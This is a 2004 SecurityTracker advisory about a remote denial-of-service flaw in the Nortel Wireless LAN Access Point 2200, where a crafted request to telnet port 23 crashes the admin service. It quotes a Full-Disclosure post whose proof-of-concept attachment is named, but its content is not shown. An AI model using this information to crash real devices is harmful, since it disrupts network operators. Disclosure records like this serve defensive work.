SecurityTracker.com

SecurityTracker
Archives


 


Category:   Device (Router/Bridge/Hub)  >   Nortel WLAN Access Point
Vendors:   Nortel
Nortel Wireless LAN Access Point 2200 Admin Port Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1009294
SecurityTracker URL:  http://securitytracker.com/id/1009294
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 2 2004
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): LAN AP 2200
Description:   A vulnerability was reported in the Nortel Wireless LAN Access Point 2200. A remote user can crash the administrative telnet service.

It is reported that Alex Hernandez discovered that a remote user can send a specially crafted request to port 23 on the target device to cause the telnet service to crash. Subsequent requests from authorized clients will not be accepted, the report said.

According to the report, the telnet and http ports are enabled by default, as are the debugging features.

Mark Ludwik has provided some demonstration exploit code, available in the Source Message [it is Base64 encoded].

Impact:   A remote user can cause the administrative telnet service to crash. [Editor's note: It may be that a remote user can cause the entire device to crash, but that is not clear from the report.]
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.nortel.com/
Cause:   Exception handling error

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Nortel Networks Wireless LAN Access Point 2200 DoS + PoC


--Hush_boundary-4043f9e13e683
Content-type: text/plain


CISSP/MCP
-Mark 


--Hush_boundary-4043f9e13e683
Content-type: application/octet-stream; name="Wlan-DoS.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Wlan-DoS.c"
--Hush_boundary-4043f9e13e683--




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 



Copyright 2019, SecurityGlobal.net LLC